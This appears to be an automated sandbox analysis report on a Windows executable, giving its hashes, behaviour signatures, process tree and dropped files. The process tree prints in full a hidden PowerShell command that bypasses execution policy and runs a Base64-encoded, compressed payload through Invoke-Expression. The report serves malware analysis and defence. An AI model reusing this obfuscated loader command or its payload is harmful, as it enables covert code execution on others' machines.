Analysis

  • max time kernel
    122s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    24/10/2023, 02:27

General

  • Target

    8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2.exe

  • Size

    384KB

  • MD5

    cddc6e9339050146fb532f76c6364ff9

  • SHA1

    e014f6777e202a6b25df3e10de0fbd4c3ae579e0

  • SHA256

    8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2

  • SHA512

    47c3c18d2842c287801b49237d9c3933f4455361492de856f1cd0d2c75a9d45092ddd8f660fd0453cea10513f32b9e5b6047cb1726a043f7b1f1befa25b99256

  • SSDEEP

    6144:dt5hBPi0BW69hd1MMdxPe9N9uA069TBSS5:dtzww69TMS5

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2.exe
    "C:\Users\Admin\AppData\Local\Temp\8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2052
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9B65.tmp\9B66.tmp\9B67.bat C:\Users\Admin\AppData\Local\Temp\8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1580
      • C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
        C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVPbTttAEH33V4wsS9iKbTkhoDQIiZvSIrUpIqh9iPLgbAayZb1r7Y6TGJp/7xictiBaVX069u7MOWcuGwg4hhPfm14odVmUxlLo36PVqPZ76UIpP5pBWc2VFOAoJwbcEN/DpaYrsvBFWqpydaqUEWF7to6hkppg02Ld4kN09N865xZzwpslw2KnU7W8qxh+Kbdfv2m3J426f+KRrR8Dx0WPcZ18nn9DQTCpHWGRjpHSiRH3SK5FCKdv3J0uFhadG+WFVPVsOGQBtBywNvY+hrcynvGmLpHDJ8RFFG8HXllDRhjVht6IMvICl54brdlouNd910u7h4O01z9Iu73BXgyDbJBF8B1MRYmulDqCoOTqpqfW5o2558Zdau6qFhj685rQj6EfceCGA5n9GgXKFYZB+Yroge8zL6j/gW96JoldrtByLxrnhruy32POOIs6B41aPc1mDeHmbOStl1IhhKyQKPp7cgSPjZPOS6t1HDx0DuJu/Od2j1R+55htbDRGsPVujWVFedxlL5J1EfrNV6fDCmwukI27Hd0rR++RzrhQF055qWZs5EOuFwojzkq6s60XEOfyXiTN4CApsJijvcBbqSVJoyEQkIzzAsH/KvV+z4dE858rc4HwdDKqtGgiHSRl7hwtbdUM6Dig4fDFG8vioE4/or6jZZxt9rMsY+hnkbdzfl1pkgWmT1tpygnalRTo0k+5dctcNSM0Zd10EDKe2/PrmIXBJt21PYpi+CnC+0e7qbfPjxXjYBM38Gr1JpRbSiYKsYRkgsLoBQwO+1m2FTmJ5eP2Bw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
        3⤵
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2236

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\9B65.tmp\9B66.tmp\9B67.bat

          Filesize

          2KB

          MD5

          eca033c64955fdba5726603cde858bf3

          SHA1

          b000490902c189913ce7296ded5eb89bb026dd4c

          SHA256

          74409e6db210f816202671fa30505219087175c4c0a6841d079b113c425508b5

          SHA512

          3af48c712a3417810a4a11fc6af61bd56aff777d6a621ef883092aeca64630ac9fdc4aa54b70ccf4baa9779e567b1a806d2ac87a95cba5ec2b27c81110ea7f4e

        • memory/2236-4-0x00000000742C0000-0x000000007486B000-memory.dmp

          Filesize

          5.7MB

        • memory/2236-5-0x00000000742C0000-0x000000007486B000-memory.dmp

          Filesize

          5.7MB

        • memory/2236-6-0x00000000027C0000-0x0000000002800000-memory.dmp

          Filesize

          256KB

        • memory/2236-7-0x00000000027C0000-0x0000000002800000-memory.dmp

          Filesize

          256KB

        • memory/2236-8-0x00000000742C0000-0x000000007486B000-memory.dmp

          Filesize

          5.7MB

        • memory/2236-9-0x00000000027C0000-0x0000000002800000-memory.dmp

          Filesize

          256KB

        • memory/2236-10-0x00000000027C0000-0x0000000002800000-memory.dmp

          Filesize

          256KB

        • memory/2236-11-0x00000000742C0000-0x000000007486B000-memory.dmp

          Filesize

          5.7MB